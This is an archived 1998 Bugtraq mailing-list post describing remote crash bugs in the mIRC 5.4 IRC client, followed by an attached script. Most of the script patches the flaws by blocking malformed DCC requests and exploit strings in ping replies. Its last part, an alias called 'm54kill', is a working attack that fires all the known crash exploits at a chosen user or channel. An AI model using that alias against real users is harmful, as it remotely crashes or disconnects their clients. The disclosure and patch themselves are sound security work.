Bugtraq mailing list archives
Another NEW mIRC bug and ALL mIRC Exploit patches
From: derek () INFINET COM (Derek Reynolds)
Date: Fri, 24 Jul 1998 08:17:51 -0400
--=====================_901297071==_ Content-Type: text/plain; charset="us-ascii" History of Events: (Remote Exploits) 07/18/98 - Someone on DALnet finds problem with DCC SEND and DCC RESUME (exploit made) 07/20/98 - $asctime bug revealed 07/21/98 - myn discovers a large problem with $calc and notices that most scripts that use on ctcpreply ping perform a $calc. He then implements the $asctime bug into on ctcpreply ping which ables a user to remotely crash the mIRC client 07/22/98 - v9 evaluates myn's bug finding and plays with on ctcpreply some more and finds that $calc evaluates custom alias's or functions. 07/23/98 - Some uninformed person believes that it is on IRCN native and posts a message to rootshell.com and forgets the big picture. Any mIRC script that makes use of the event "ON CTCPREPLY PING" which does a $calc or any other remote/event that uses $calc is exploitable. Most people are only patching themselves against the $calc bug, but are still wondering why their mIRC keeps crashing.. Its because they have not patched themselves against the 2 other remote mIRC exploits. Below is the patch for ALL known remote mIRC exploits. to install it type "/load -rs m54-fix-sploits.mrc" Peace. myn@efnet --=====================_901297071==_ Content-Type: text/plain; charset="us-ascii" Content-Disposition: attachment; filename="m54fix-sploits.mrc" ;mIRC 5.4 QuickFIX and Exploits ;myn@efnet - 07/22/98 ;Here is the Quick Fix for all know mIRC 5.4 Exploits to date (07/22/98) ;DCC exploit fix ctcp *:DCC SEND: { if $4 == 9582342556 { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } } ctcp *:DCC RESUME: { if $4 == $null { .ignore -tu300 $wildsite | echo -a * Bad send request from $nick $+ : $+ $address $+ : $3- | halt } } ;ctcpreply ping $asctime crash and $identifier Exploit fix ;replace all instances of the event "on ctcpreply" with the one below on 1:CTCPREPLY:PING* { if (2147483647 isin $2) { echo -a * Incoming ctcpreply asctime exploit from $nick | halt } if ($ isin $2-) { echo -a * Incoming ctcpreply identifier exploit --> $2- from $nick | halt } echo -a * [ $+ $nick PING reply]: $calc($ctime - $2-) sec(s) halt } ;And as an added bonus for all you DALnet kiddies ;This sends all known mIRC 5.4 exploits at once alias m54kill { if ($1) { .ctcpreply $1 ping $!quit(I'm, a, DALnet, KiDDie) %ip = $rand(600000000,4294967294) .quote privmsg $1 : $+ $chr(1) $+ DCC SEND $r(1,99) $+ .txt %ip $r(113,9000) $+ $chr(1) $+ $lf $+ privmsg $1 : $+ $chr(1) $+ DCC RESUME $r(1,99) $+ .txt $+ $chr(1) .ctcpreply $1 ping $!asctime(2147483647) echo -a * Sent mIRC kills to $1 halt } echo -a * Parms [/m54kill nick/#channel] } --=====================_901297071==_--
Current thread:
- CFINGERD root security hole, (continued)
- CFINGERD root security hole John Goerzen (Jul 23)
- Re: CFINGERD root security hole Roscinante (Jul 24)
- Microsoft Security Bulletin (MS98-006) Aleph One (Jul 24)
- SECURITY: new ncurses packages twiztah (Jul 24)
- FW: Microsoft Security Bulletin (MS98-007) MacGyver (Jul 24)
- Microsoft Security Bulletin (MS98-007) Aleph One (Jul 25)
- Alert: New Source Bug Affect Sun JWS Aleph One (Jul 25)
- Annex DoS Albert Nubdy (Jul 25)
- Re: Annex DoS Matt Carter (Jul 26)
- Security warning: Netscape https & proxies Henrik Nordstrom (Jul 26)
- Another NEW mIRC bug and ALL mIRC Exploit patches Derek Reynolds (Jul 24)
- Re: Another NEW mIRC bug and ALL mIRC Exploit patches Mike Zimmerman (Jul 25)
- small bug in 5/98 distribution Sun 4070627 Lloyd Vancil (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- Re: small bug in 5/98 distribution Sun 4070627 Brandon Hume (Jul 26)
- Re: small bug in 5/98 distribution Sun 4070627 Casper Dik (Jul 27)
- FW: Alert: Arbitrary code execution via email or news Patrick Oonk (Jul 27)
- ISS Security Advisory -- MS Exchange 5.x Jon Larimer (Jul 27)
- [ NT SECURITY ALERT ] New Local GetAdmin Exploit MJE (Jul 27)
- Microsoft Security Bulletin (MS98-009) Aleph One (Jul 28)
- Microsoft Security Bulletin (MS98-008) Aleph One (Jul 27)
- Re: small bug in 5/98 distribution Sun 4070627 Eugene Bradley (Jul 24)
- CFINGERD root security hole John Goerzen (Jul 23)